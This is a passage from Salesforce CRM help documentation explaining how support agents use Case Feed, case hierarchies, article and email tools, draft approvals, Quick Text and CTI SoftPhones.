Available in: Enterprise, Unlimited, and Developer Editions

Feed filters make it easy for support agents to see all updates of one type, such as all call logs or all email messages, when
working with cases in Case Feed. By using filters, agents can find the information they need more quickly, without having to
browse through each case event.

When creating or editing feed layouts, administrators can specify which filters are available:

• Choosing only All Updates automatically shows all events on a case and hides the list of individual feed filters. Use this
option if you want support agents to see the complete history of a case.

• Choosing only one type of feed filter automatically shows only case events of that type and hides the list of individual feed
filters. For example, if you select only Emails, the feed for each case shows the email messages related to the case but not
case notes, portal replies, or other activities. This option is useful for agents who provide support primarily by one
channel—phone, email, or portal—and who need to see case events only for that channel.

• Choosing more than one type of feed filter shows a list of available filters in the left sidebar of the Case Feed page or above
the feed in the center of the page, with the first filter selected by default. For example, if you make the Emails, Status
Changes, and Portal Answers filters available, the feed for each case shows, by default, the email messages related to
the case; users can click the other filters to see other types of case events. Use this option if your agents tend to provide
support in one channel but also need to be able to see other types of case updates.

In addition, administrators can specify how and where the list of feed filters appears:

• As a fixed list in the left column.

1687

Accessing Case FeedCase Feed



• As a floating list in the center column. With this option, the feed filters list remains visible as users scroll down the page.
This can be useful with long feeds, as it lets agents quickly filter case activities from anywhere on the page, without having
to scroll to the top.

• As a drop-down list in the center column.

See Also:
Case Feed Overview

Case Feed and Related Lists
Available in: Enterprise, Unlimited, and Developer Editions

The traditional case interface contained numerous case details and related lists. With Case Feed, you'll find that some items
have been moved out of related lists and are now created in the publisher and displayed in the feed.

Use this table to find case items in the new interface.

Case Feed User Interface

Case Detail
Page

FeedPublisherActionTraditional Cases Related
List

Log a callActivity History

View logged calls

Create and reply to customer emails

View emails

Submit for approvalApproval History

View approval history

Attach files to case directlyAttachments (see note)

Attach files to case by attaching to an email

View attached files

Create case noteCase Comments (see note)

View case note

Create public customer comment

View public customer comment

View private comment that was created with
traditional interface
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Case Feed User Interface

Case Detail
Page

FeedPublisherActionTraditional Cases Related
List

View case historyCase History

Create case teamCase Team

View case team

Create contact rolesContact Roles

View contact roles

Create and reply to customer emails

View or preview contentContent Deliveries

Create and deliver content

Create customer emailsEmails

View emails

Create and edit tasksOpen Activities

View tasks

Create and edit events

View events

Create and edit related casesRelated Cases

View related cases

View suggested solutionsSolutions

Find solutions

Note:

In Case Feed private comments have been replaced by case notes, which are Chatter posts and aren't available from
the Case Comments related lists.

Attachments to case notes aren't included in the Attachments related list.

See Also:
Logging a Call
Creating Case Notes
Viewing and Editing Cases from the Case Detail Page in Case Feed
Using Printable View in Case Feed
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Using Printable View in Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

The printable view option in Case Feed lets you view and print a comprehensive list of the information related to a case.

Printable view, which you access by clicking  on any Case Feed page, displays information in the following order:

1. Case details
2. Contents of related lists that are included on the Case Detail page
3. Internal notes

Notes and Tips

• Depending on the related lists that are included on the Case Detail page, certain case events, such as email messages and
logged calls, may not appear in the printable view. To ensure that emails and call logs are included, customize your Case
Detail page layouts for Case Feed users to add the Activity History related list. To include public portal posts, add
the Case Comments related list.

• Internal notes are listed under the heading Chatter on the printable view page.
• Related lists that don’t have data in them aren’t displayed in the printable view, even if they’re included in the Case Detail

page layout.
• If your Case Detail page layout includes custom links and buttons, they appear in the case details section in the printable

view.
• Printable view shows 500 each of the most recent internal note posts, links, and documents, and 100 of the most recent

comments on each of these posts.

See Also:
Accessing Case Feed
Viewing and Editing Cases from the Case Detail Page in Case Feed

Escalating Cases on the Case Feed Page
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on casesTo escalate a case:

1. Click Change Status on the Case Feed page.
2. Optionally, enter text about the case.
3. Select Escalated from the Change to: drop-down list.
4. Click Change Status.
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Note:  If your organization has case escalation rules, such as those that assign escalated cases to particular agents
or queues, they’re applied when you click Change Status.

See Also:
Case Feed Overview

Viewing and Editing Cases from the Case Detail Page in
Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View” on casesTo view a case:

“Edit” on casesTo edit a case:

“Delete” on casesTo delete a case:

From the Case Detail page, you can see additional information about a case. You can also update the case and work with
related lists. For example, you can:

• View and edit case information, including changing contact and account information, status, origin, priority, type, and
case reason.

• Change or update the case subject and description.

• View related lists and use them to complete additional tasks (for example, adding attachments to the case, viewing approval
history, or adding members to a case team). The available related lists are determined by the lists your administrator has
enabled for cases. You can access related lists by scrolling to them on the Case Detail page or by using the links that appear
below the View Case Details button when you click it.

• Close a case.

• Delete a case.

• Clone a case.

Note:  If your organization has inline editing enabled, you can use it on the Case Detail page.

To go to the case feed page from the Case Detail page, click Answer Customer, Log Call, or Write Case Note.

To go to the Case Detail page from the feed, click View Case Details or select Detail View from the menu to the right of
the publisher.
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To open a printable display of the case details, click Printable View on any page in Case Feed.

See Also:
Case Feed Overview

CASE HIERARCHIES

Viewing Case Hierarchies
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view cases:

“Read” on casesTo view parent cases:

A case hierarchy shows you cases that are associated with one another via the Parent Case field. When a case is associated
with a parent case it signifies a relationship between cases, such as a grouping of similar cases for easy tracking, or a division
of one case into multiple cases for various users to resolve. In the case hierarchy, cases are indented to show that they are related
to the parent case above them.

• To view the hierarchy for a case, click View Hierarchy next to the Case Number field on the case detail page.

• To specify that a case is associated with another case, edit the case and type the case number of the parent in the Parent
Case field. Alternatively, you can click the lookup icon to search for a case's case number.

Note:  A parent case must exist before it can be entered and saved in the Parent Case field.

• To create a new case that is automatically associated with a case whose detail page you are viewing, click the New button
on the Related Cases related list. From the New drop-down button, you can choose to create either a blank case or a case
with information from the parent case.

See Also:
Displaying and Editing Cases
Creating Cases
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Related Cases
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view cases:

“Create” on casesTo create cases:

If set up by your administrator, case detail pages include a Related Cases related list, which displays all of the cases directly
below a parent case in a case hierarchy. Cases can be associated with each other via the Parent Case lookup field on a case
edit page. When a case is associated with a parent case it signifies a relationship between cases, such as a grouping of similar
cases for easy tracking, or a division of one case into multiple cases for various users to resolve.

From the Related Cases related list, click:

• New and choose from the drop-down button to create either a blank case or a case with information from the parent case.

• Edit to modify an existing case.

• Cls to close an existing case.

To perform mass actions from the Related Cases related list, select the checkboxes next to the cases you wish to update, and
click:

• Close to close the selected cases using the values you specify.

• Change Owner to assign the cases to the one user or queue you specify.

• Change Status to change the Status of the cases to the value you specify.

See Also:
Viewing Case Hierarchies
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RESOLVING CUSTOMER INQUIRIES

SOLVING CUSTOMER INQUIRIES

Solving Cases
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on cases

AND

“Read” on solutions

To solve cases:

To solve a case:

1. View the case.
2. Find an article or find a solution that answers the case's question.
3. Attach the article or solution to the case by clicking Select next to a reviewed solution in the list of solutions. Or, click the

title of an unreviewed solution and choose Select on the solution detail page.
4. Email the solution to the contact by clicking Send Email in the Activity History related list.

a. Click Select Template and choose a template.

You or your administrator can create email templates that automatically include the case description, solution detail,
solution attachments, and other fields.

b. Fill in the email fields.
c. Click Send.

The emailed solution or article is logged as an activity in the Activity History related list.

5. Close the case.

See Also:
Suggested Solutions Overview
Multilingual Solutions Overview
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Using Suggested Articles to Solve Cases
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Cases”

AND

“Customize Application”

To change support settings:

“Read” on the article's article typeTo view articles:

Suggested articles help knowledge base users solve cases quickly. As soon as a new case is saved, the search engine automatically
looks for articles that have keywords in common with the case subject. The user working the case can scan the articles and
attach them to the case if needed, or initiate another search with different keywords. Articles attached to the case appear on
the Articles related list, which also provides a Find Articles button to search the knowledge base at any time.

To enable suggested articles:

1. From Setup, click Customize > Cases > Support Settings.
2. Click Edit and choose Enable suggested articles. Suggested articles and suggested solutions cannot be enabled at the

same time.
3. Choose each audience (channel) that should receive suggested articles when submitting a case. Suggested articles are

available for the internal app and the portals.
4. When you're done with the Support Settings page click Save.

Note: If you don't find a solution in the suggested articles, you can create an article by clicking New.

See Also:
Salesforce Knowledge Overview
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Using the Articles Tool in Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND

“Read” on at least one article type

To use articles in Case Feed:

The articles tool in Case Feed lets you access and interact with Salesforce Knowledge articles directly from a case’s feed. Before
you can use the articles tool, your administrator needs to set up and configure Salesforce Knowledge.

With the articles tool, you can:

• Search for articles

• Attach articles to a case

• Email articles to customers

Searching for Articles in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND

“Read” on at least one article type

To use articles in Case Feed:

Before you can use the articles tool, your administrator needs to set up and configure Salesforce Knowledge.

When you open the articles tool in the feed for a case by clicking , you see a list of articles related to the case subject.
Click on a title to open the article in a new window. Once you find the article you want, you can attach it to the case or email
it to the customer.

To find other articles, type the word or phrase you want to search for in the text box and click Search.

If you don’t find the article you want, or if you’d like to refine your search results, use the advanced search tool:

1. Click Advanced articles search.
2. On the Advanced Search page, type a word or phrase in the Search text box.
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3. To limit your search to certain types of articles, select the checkboxes next to them in the Search Only Article Types
list.

4. Click Go.
5. When you find an article that’s relevant to the case, select the article’s checkbox and click Attach to Case.

Attaching Articles to Cases in Case Feed

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND
”Read” on at least one article type

To attach articles to cases:

Before you can use the articles tool, your administrator needs to set up and configure Salesforce Knowledge. To attach an
article to a case in Case Feed:

1. Click  to open the articles tool.

2. In the list of case-related articles, click  next to the one you want, and select Attach to case.

If you don’t see the article you want, try searching for it.

Closing Cases
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on casesTo close cases:

You can close a case from several locations and, depending on the settings for your organization, create a solution or article
while closing the case.

1. Click Close Case on the case detail page, Cls on the Cases related list, or Save & Close while editing the case.

If enabled by your administrator, you can select Closed from the Status field on case edit pages and click Save without
having to follow any more steps.

2. Select the Status, Case Reason, and any other fields as needed.
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3. If your organization uses solutions, you can fill in the Solution Details for the case. Remove the check from Submit
to public solutions if you do not want to submit the solution for review by your solution managers. Leaving this
field checked automatically links the case to the solution.

4. If there is a contact associated with this case, select the Notify contact on case close checkbox to send an email
based on the Case Close Template to the contact when the case is closed.

5. Click Save or Save and Create Article. The article option is available if your organization uses Salesforce Knowledge and
article submission during case close is enabled.

An administrator or user with the “Manage Cases” permission can close multiple cases at one time using the Close button on
the cases list page. This is recommended for cases that are similar and have the same solution.

See Also:
Deleting Cases
Tips on Writing Solutions

Closing Cases in Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on casesTo close a case:

In Case Feed, you can close cases directly in the feed or from the case detail page. Closing a case in the feed is fast and easy,
and you can include basic information about the case resolution. Closing a case from the case detail page lets you add more
information, including the reason the case was closed and the solution used to resolve it.

• Closing Cases on the Case Feed Page

• Closing Cases on the Case Detail Page

See Also:
Accessing Case Feed
Creating Case Notes
Logging a Call
Sending an Email from the Case Feed Page
Case Feed Overview
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Closing Cases on the Case Feed Page

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on casesTo close a case:

1. Click Change Status on the Case Feed page.
2. Optionally, enter text about the case.
3. Select Closed from the Change to: drop-down list.
4. Click Change Status.

Closing Cases on the Case Detail Page

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on casesTo close a case:

1. Click View Case Details on the Case Feed page.
2. Click Close Case.
3. Select Status, Case Reason, and any other fields as needed.
4. If your organization uses solutions, you can fill in the Solution Details for the case. Select Submit to public

solutions to submit the solution for review by solution managers.
5. Click Save.
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Sending Articles from Cases
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To set up Email-to-Case or On-Demand Email-to-Case:

“Modify all Data”

AND

“Customize Application”

To enable Email-to-Case or On-Demand Email-to-Case:

“Customize Application”To customize page layouts:

“Edit HTML Templates”To create or change HTML email templates:

“Manage Public Templates”To create or change public email template folders:

“Customize Application”To create or change Visualforce email templates:

If articles are associated with a case, users working on the case can attach PDF versions of the articles to an email simply by
choosing a template you create. This capability is available if Email-to-Case or On-Demand-Email-to-Case  is set up and
the Email related list is visible on case page layouts.

Creating an Email Template that Converts Articles to PDF Files

To allow users working on a case to automatically attach article PDFs to an email message:

1. From Setup, click Communication Templates > Email Templates.
2. Click New Template to create a template from scratch or click Edit next to an existing template. The new or edited

template must include the Articles as PDFs case field.
3. For example, If you want to edit the SUPPORT: Case Response with Solution (SAMPLE) template to include articles instead

of solutions, complete these steps:

a. Click Edit next to the SUPPORT: Case Response with Solution (SAMPLE) template.
b. Change the Email Template Name to SUPPORT: Case Response with Article (SAMPLE).
c. Modify the Template Unique Name as needed.
d. Choose Case Fields from the Select Field Type drop-down menu.
e. Choose Articles as PDFs from the Select Field drop-down menu.
f. Copy the value from the Copy Merge Field Value field and paste it in the email body.

4. Click Save.

On the case detail page in the Emails related list, users can now click Send an Email and choose the new template. Articles
associated with the case are automatically converted to PDF attachments, and the attachments can be previewed or deleted
if needed before the email is sent.

Note:  Both the article and the knowledge base must be in the same language. For example, if your knowledge base
language is English but you want a Japanese article converted into a PDF, change your knowledge base language to
Japanese (in Setup, click Customize > Knowledge > Settings > Edit) before converting the article.
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Notes on Field Visibility in Article PDFs

Consider the following information when using email templates that include the Articles as PDFs function:

• The fields that appear in article PDFs are determined by your profile if the Use a profile to create
customer-ready article PDFs on cases checkbox (from Setup, click Customize > Knowledge > Settings) is
not selected. If you can see all fields in the original article, all fields also appear in the automatically generated PDF. If
field-level security restricts you from seeing a field on an article, that field and its data do not appear in the article's PDF.

• If the Use a profile to create customer-ready article PDFs on cases checkbox is selected and a profile
is chosen from the Profile menu (from Setup, click Customize > Knowledge > Settings), the chosen profile determines
which fields appear in automatically generated PDFs. For example, if you are sending article PDFs to customers, you might
choose the Customer Portal User profile to ensure that internal-only fields do not appear in article PDFs.

• Fields in the Properties section of an article, including First Published, Last Modified, Last Published, and
Summary, are not included in any PDF version regardless of setting or profile.

See Also:
Salesforce Knowledge Overview
Setting Up Salesforce Knowledge

RESPONDING TO CUSTOMERS

EMAILING CUSTOMERS

Working with Case Emails
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on casesTo view cases:

“Edit” on casesTo work with case emails:

Cases generated via Email-to-Case or On-Demand Email-to-Case display in an Emails related list. The Emails related list
includes all emails sent by your customer regarding a particular case, as well the email threads between you and your customer.
The first 77 characters of an email message appear in the related list so that you can see what the message is about without
having to click on it.

To work with Email-to-Case or On-Demand Email-to-Case emails:

• Click Send An Email to send an email to a contact, another user, or any other email address.
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• Click Reply to respond to an email. The email response automatically includes the email body as received from the customer.
Enter your response and click Send.

When you reply to email messages in the Email related list on cases, the From: field on your email may display to recipients
as no-reply@salesforce.com or support@company.com. This is due to how the recipients' email applications
receive Sender and From headers on inbound email. By default, an Enable Sender ID compliance setting is selected
for your organization, which enables email messages sent from Salesforce to comply with email applications that require
Sender headers for delivery.

• Click To All to respond to all participants on an email thread.

• Click the subject of the email to view the email. From the email, you can reply to the sender, reply to everyone, forward
the email, or delete it.

• While viewing an email, you can display a list of all the emails associated with the case by clicking Email Message List,
and you can navigate to the case's other emails by clicking Next or Previous.

Note:  The Email Message List, Next, and Previous links are not available in the Customer Portal and partner
portal.

• While viewing an email, click Forward to forward it. The email automatically includes the email body as received from
the customer. Optionally, enter text and click Send.

• If the original email was an HTML email, you can click the Click here to view HTML version link to see the HTML
version. If you want to see the entire email header, click the Click here to view original email headers link.

• To view any attachments contained in incoming emails, go to the Attachments related list of the email. To view attachments
sent with outbound emails, view the Attachments related list of outbound emails.

The size limit for an attachment is 5 MB. The user who configured the email agent can view its log file to see if any
attachments exceeded the size limit.

• Click Del to delete an email. Note that a deleted email can be retrieved from the Recycle Bin. However, if you delete an
email from a case, then delete the case, you will not be able to retrieve the deleted email from the Recycle Bin.

In the Email related list, emails are listed in the order received according to the most recent. Emails in the related list display
one of the following statuses:

DescriptionEmail Status

An inbound email that has not been read.

The contents of the Subject field display in bold for emails
with a New Status.

New

An inbound email that has been read but not replied to.Read

An outbound email.Sent

An inbound email that has been replied to. Replying to a sent
email gives it a replied status.

Replied

When a case contains a new (unread) email, an “Email” task associated with that case is automatically created in the case
owner's task list with the email subject displayed. The owner can easily see the new task on the Home tab or from the Open
Activities related list of the case. From the task, the owner can click a link to view the email associated with the case. When
the user responds to the email, the task is removed from the owner's task list and added to the case's Activity History related
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list. The user can also move an email task to which they have not responded to the Activity History related list by changing
its status to “Completed.”

Note:  When inbound emails create a new case and your assignment rules route that case to a queue, the “Email” task
is assigned to the user configured in the email agent.

If an inbound email does not contain the email address of an existing contact, then the Web Name field on the case
is automatically updated with the name in the From field of the email, and the Web Email field on the case is
automatically updated with the address provided in the inbound email.

Tip:  When running the Cases with Emails report, add the Is Incoming field to the report to see the cases received
via Email-to-Case.

See Also:
Sending Articles from Cases

Replying to an Email from the Case Feed Page
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Send Email”To send emails:

Note:

• The email option in Case Feed is available only if your organization uses Email-to-Case.
• Depending on how your administrator has set up Case Feed, some of the options described below may not be

available to you.

To reply to an email from the Case Feed page:

1. On the email post in the feed, click Reply or Reply All.
The email displays in the Answer Customer panel.

2. The To field is populated with the email address of the contact or customer. Optionally, use search to find a different or
additional recipient (such as a contact, lead, or person account), or type an email address.

3. The Cc and Bcc fields display recipients who were previously copied on the message. Click Add Cc or Add Bcc to add
more recipients to the email, or type an email address.

You can use semicolons, commas, spaces, or new lines to enter multiple addresses.

4. Optionally, enter a different email subject.
5. Create your message. To include formatting, such as lists or bold text, use the rich text editor. Optionally, choose a template

to use or add Quick Text messages.
6. If your administrator has enabled support for email drafts, you can click Save to save a copy of your message without

sending it. When you save a message as a draft, any agent with access to the case can edit it.
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7. Optionally, click Attach File to attach a file to the message. For each file you want to attach to the message:

a. Enter the name of the file, or click Browse to search for the file.
b. Click Attach to Email.
c. Click Done.

8. Optionally, attach an article to the message.
9. Click Send Email.

Note: Depending on how your administrator has set up Case Feed, this button may have a different name.

See Also:
Accessing Case Feed
Sending an Email from the Case Feed Page
Communicating with Customers via the Customer Portal and Chatter Answers
Logging a Call
Creating Case Notes
Case Feed Overview
Emailing Articles in Case Feed

Sending an Email from the Case Feed Page
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Send Email”To send emails:

Note:

• The email option in Case Feed is available only if your organization uses Email-to-Case.
• Depending on how your administrator has set up Case Feed, some of the options described below may not be

available to you.

To respond to a customer using email:

1. Click Answer Customer on the Case Feed page.
2. Select Email if it’s not selected already.

Depending on how your administrator has set up Case Feed, you may be able to click Email without first having to click
Answer Customer.

3. Select a From address.
4. By default, the email recipient is the case's creator (as long as the creator is an existing contact). If the creator isn't a contact,

enter the customer's email address in the To line.
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5. Optionally, choose additional recipients to the To field. (A recipient can be a contact, lead, or person account). Click 
and use search to find recipients.

6. Optionally, click Add Cc or Add Bcc to add additional recipients to the email, or enter an email address.

You can use semicolons, commas, spaces, or new lines to enter multiple addresses.

7. By default, the email subject is the name of the case it’s related to. Optionally, enter a different subject for the email.
8. Create your message. To include formatting, such as lists or bold text, use the rich text editor. Optionally, choose a template

to use or add Quick Text messages.
9. If your administrator has enabled support for email drafts, you can click Save to save a copy of your message without

sending it. When you save a message as a draft, any agent with access to the case can edit it.
10. Optionally, click Attach File to attach a file to the message. For each file you want to attach to the message:

a. Enter the name of the file, or click Browse to search for the file.
b. Click Attach to Email.
c. Click Done.

11. Optionally, attach an article to the message.
12. Click Send Email.

Note: Depending on how your administrator has set up Case Feed, this button may have a different name.

See Also:
Accessing Case Feed
Replying to an Email from the Case Feed Page
Communicating with Customers via the Customer Portal and Chatter Answers
Case Feed Overview
Emailing Articles in Case Feed
Using Quick Text in Case Feed

Emailing Articles in Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Cases”

AND
”Read” on at least one article type

To email articles:

Before you can use the articles tool, your administrator needs to set up and configure Salesforce Knowledge. To attach an
article to an email message in Case Feed:

1. Write a reply to a customer’s email or compose a new message.
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2. Click  to open the articles tool.

3. In the list of case-related articles, click  next to the one you want.
4. Select how you want to include the article.

• Email to customer attaches the article as a PDF.
• Attach and share article link from site, where ‘site’ is an external site, includes the URL within the

email body. In HTML email, the URL is a link. In plain text email, the URL is in plain text (not linked).

If you don’t see the article you want, try searching for it.

Using Email Templates in Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Send Email”To send emails

If your organization has created text, HTML, or Visualforce email templates, or if you’ve created your own templates, you
can use them when emailing customers in Case Feed. By using a template, you ensure consistency, save time, and can include
standard information, such as a customer’s name and their case number, all with one click. For best results, we recommend
using the rich text editor when working with email templates.

Note:  Depending on how your administrator has set up Case Feed, you may see a pre-loaded template when you
use the Email publisher. Use the steps below to choose an alternative template if needed.

To use a template:

1. Click Answer Customer, and select Email.
Depending on how your administrator has set up Case Feed, you may be able to click Email without first having to click
Answer Customer.

2. Click Select a Template.
3. Choose the folder that has the template you want.
4. Click the name of the template to add it to the email.

Tip:

• If you choose more than one text or HTML template, each template is added in the order you choose it. If
you choose a Visualforce template after choosing another template, it replaces the earlier template.

• If the template you choose has attachments, they’re included with the message.
• If the template you choose has merge fields, only the case-related fields are merged.

• To remove a template, click . This also deletes any text you’ve entered and removes all template attachments.

5. Finish writing and sending your message.
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Working with Draft Emails
Available in: Enterprise, Unlimited, and Developer Editions

Draft emails let support agents save messages they write to customers without having to send them immediately, and also
make it possible for administrators to create approval processes for email messages. Drafts are only supported if your administrator
has enabled them.

As a support agent, you might want to save a message as a draft while you gather additional information about the issue you’re
solving, confirm troubleshooting steps with a colleague, or take a break and log out of Salesforce. To save an email as a draft,
click Save under the text box when you’re writing an email.

Note:  Drafts aren’t auto-saved.

Each case can have only one draft email associated with it, so if you’re working on a case with a draft you or someone else has
saved, you won’t be able to write another email until that draft is sent or discarded. When you view a case with a draft associated
with it, you see a notification with the name of the user who wrote the draft and a link to view it. Any agent or supervisor with
access to a case can edit the draft email, unless it’s awaiting approval.

If your company uses approval processes for email messages, when you submit a message, it’s sent to a supervisor for review.
(Depending on how your administrator has set up approval processes, you may have the option of submitting the message for
review or sending it without review.) When a supervisor approves the message, it’s sent to the customer. If your email isn’t
approved, a message with an explanation appears at the top of the publisher when you click Email while viewing the case.
You can edit the message and resubmit it.

See Also:
Reviewing and Approving Email Drafts

Reviewing and Approving Email Drafts
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Send Email”

AND
Inclusion in an email approval process

To review and approve email drafts:

Depending on how your administrator has set up draft emails and approval processes for your organization, you may need to
review and approve messages written by the agents you oversee before those messages are sent to customers. When an agent
submits a message for approval, you receive an email notification with a link to the case that includes the message. A notice
appears at the top of the publisher when you click Email. Click View email to go to the message detail page. On that page:
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• Click Unlock Record to make the message editable.

• Click Delete to discard the draft.

• Click Approve/Reject in the Approval History related list to approve or reject the message.

• Click Reassign to assign the approval to another supervisor.

If you approve the message, it’s sent to the customer. If you reject it, you have the option of writing a note explaining why.
This note appears above the publisher on the case page when the agent clicks Email, along with a notice that the draft has
been rejected.

See Also:
Working with Draft Emails
Enabling Default Email Templates in Case Feed
Creating Approval Processes for Email Drafts

Using the Rich Text Editor in Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Send Email”To send emails:

The rich text editor in Case Feed lets you customize the emails you send to customers. You can use it to:

• Choose a variety of font types and sizes
• Change the alignment and indentation of your text
• Add bulleted and numbered lists

For you to use the editor, your administrator must have enabled Email-to-Case.

Accessing the Editor

The editor appears when you click Answer Customer on the Case Feed page and select Email, unless:

• Your administrator hasn’t selected the Enable HTML Email checkbox on the Email-to-Case Settings page selected.
• You used the plain text editor the last time you contacted a customer by email.

In these situations, the plain text editor will appear. Click the toggle icon  to switch to rich text.

Note:  Depending on how your administrator has set up Case Feed, you may be able to click Email without first
having to click Answer Customer.

Tips on Using the Rich Text Editor

• The rich text editor in is available only for the Email action.
• If you enter HTML and other kinds of markup in the editor, it won’t render when you send a message.
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•
To delete a message, click .

Using Quick Text in Case Feed
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on Quick TextTo use Quick Text in Case Feed:

Quick Text helps you respond to customers more efficiently by letting you insert pre-written messages, such as greetings and
common troubleshooting steps, into customer communications like email and chats. In Case Feed, you can use Quick Text
with the Email action.

Note:  Only Quick Text messages assigned to the Email channel are available in the Email panel.

1. Click Answer Customer.

2. Click  and select Email.

Depending on how your administrator has set up Case Feed, you may be able to click Email without first having to click
Answer Customer.

3. In the email text box, type ;;.
A list of Quick Text messages appears, with the messages you’ve used most recently at the top.

4. To see additional messages, type a word or phrase.
A list of messages that include those words appears.

5. To see the title and full text of a message, click it once or highlight it using the arrow keys on your keyboard.
The full message appears at the bottom of the Quick Text list.

6. To select a message and add it to your email, double-click it or highlight it and press ENTER.
If the message you select contains merge fields, they are resolved when you add the message to your email.

PHONING CUSTOMERS

Salesforce CRM Call Center System Requirements
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Salesforce CRM Call Center requires the installation of a light-weight computer-telephony integration (CTI) adapter on
every Salesforce user’s machine. The minimum system requirements for an adapter are:
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• For adapters built with CTI version 4.0 or higher:

◊ Microsoft® Internet Explorer® 8; Mozilla® Firefox® 3.5; Apple® Safari® 4; Google Chrome™ 10.0

◊ Microsoft Windows® XP (with Microsoft .NET framework)

• For adapters built with previous versions of CTI:

◊ Internet Explorer 7 or 8; Firefox 3.5 or 3.6 (Safari and Chrome are not supported)

◊ For Windows 7 32-bit, 32-bit Internet Explorer 8; Firefox 3.5 or 3.6

◊ For Windows 7 64-bit, 64-bit Internet Explorer 8; Firefox 3.5 or 3.6

◊ 256 MB of RAM (512 MB recommended)

◊ 20 MB disk space minimum

◊ Intel® Pentium® II processor, 500 MHz or above

◊ Windows XP

Note:  If you’re using a CTI adapter built with version 4.03 of the CTI Toolkit, a popup window displays when using
Firefox or Chrome browsers. This popup window must display on your machine to stay connected to Salesforce CRM
Call Center.

See Also:
Call Center Overview
Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone

SoftPhone Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

A SoftPhone is a customizable call-control tool that appears to users assigned to a call center with machines on which CTI
adapters have been installed. A SoftPhone's functionality, user interface, and location are determined by the version of the
CTI Toolkit with which it was built. See:

• About CTI 1.0 and 2.0 SoftPhones on page 1711

• About CTI 3.0 and 4.0 SoftPhones on page 1713

See Also:
Call Center Overview
Salesforce CTI Toolkit Overview
Service Cloud Console Overview
Using the SoftPhone
Using a SoftPhone with a Service Cloud Console
Checking the Version of Your CTI Adapter
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About CTI 1.0 and 2.0 SoftPhones

Available in: Professional, Enterprise, Unlimited, and Developer Editions

A SoftPhone is a customizable call-control tool that appears to users assigned to a call center with machines on which CTI
adapters have been installed. SoftPhones built with versions 1.0 or 2.0 of the CTI Toolkit display in the sidebar of every
Salesforce page. Although administrators and developers can customize CTI 1.0 or 2.0 SoftPhones, they usually include the
following components:

Call center state area

Includes a drop-down list that lets you specify whether you're ready to receive calls. See Changing Your Call Center
State on page 1724.
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Phone line header

Shows the status of the phone line. A status icon changes colors and blinks ( ), and provides a text description. You
can click the name of the line (Line 1) to show or hide the line's dial pad and call information area.

Call information area

Shows data related to the call, such as the phone number the customer used to dial, the duration of the call, and links
to any records associated with the call.

Call button area

Shows buttons that let you make call commands, such as dialing, hanging up, putting a caller on hold, transferring,
conferencing, and opening a second line while on a call. See Using the SoftPhone on page 1722.

Current call log area

Displays log information for the call. By default, the Subject field includes the date and time of the call, but users can
edit this field. The Name field lets users specify a related contact, lead, or person account, while the Related To field
lets them attach an additional record to the call log once the call ends. Users can enter additional information about the
call in the Comments text box. Call logs are saved in an activity record that can be retrieved from the recent calls area
of the SoftPhone, or the Activity History related list of the associated records. See Creating Call Logs in the SoftPhone
on page 1717.

Recent calls area

Displays saved logs for calls that have recently completed. Click a log's Subject to open its detail page, or click a log's
Name or Related To link to open its associated record. Click Edit to reopen a call log for editing in the SoftPhone.

My Calls Today report

Opens a report of all the calls you've made or received in the last day.

SoftPhone logo

Displays a customizable logo for each CTI adapter.

Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
your SoftPhone because of customizations that have been made for your organization or the CTI Toolkit with which
your SoftPhone was built. See your administrator for details.

See Also:
SoftPhone Overview
Call Center Overview
Salesforce CTI Toolkit Overview
Service Cloud Console Overview
Using the SoftPhone
Tip sheet: Getting Started with your SoftPhone
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About CTI 3.0 and 4.0 SoftPhones

Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

A SoftPhone is a customizable call-control tool that appears to users assigned to a call center with machines on which CTI
adapters have been installed. SoftPhones built with versions 3.0 and 4.0 of the CTI Toolkit display in the footer of the Service
Cloud console or in the sidebar of every Salesforce page. Although administrators and developers can customize CTI 3.0 and
4.0 SoftPhones, they usually include the following components:

Call center state area

Includes a drop-down list that lets you specify whether you're ready to receive calls. See Changing Your Call Center
State on page 1724.

Phone line header

Shows the status of the phone line. A status icon changes colors and blinks ( ), and provides a text description. You
can click the name of the line (Line 1) to show or hide the line's dial pad and call information area.

Call information area

Shows data related to the call, such as the phone number the customer used to dial, the duration of the call, and links
to any records associated with the call.

Call button area

Shows buttons that let you make call commands, such as dialing, hanging up, putting a caller on hold, transferring,
conferencing, and opening a second line while on a call. See Using the SoftPhone on page 1722.

My Calls Today report

Opens a report of all the calls you've made or received in the last day.

SoftPhone logo

Displays a customizable logo for each CTI adapter.
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Note:  Some Salesforce CRM Call Center features that are described in this help system might not be available with
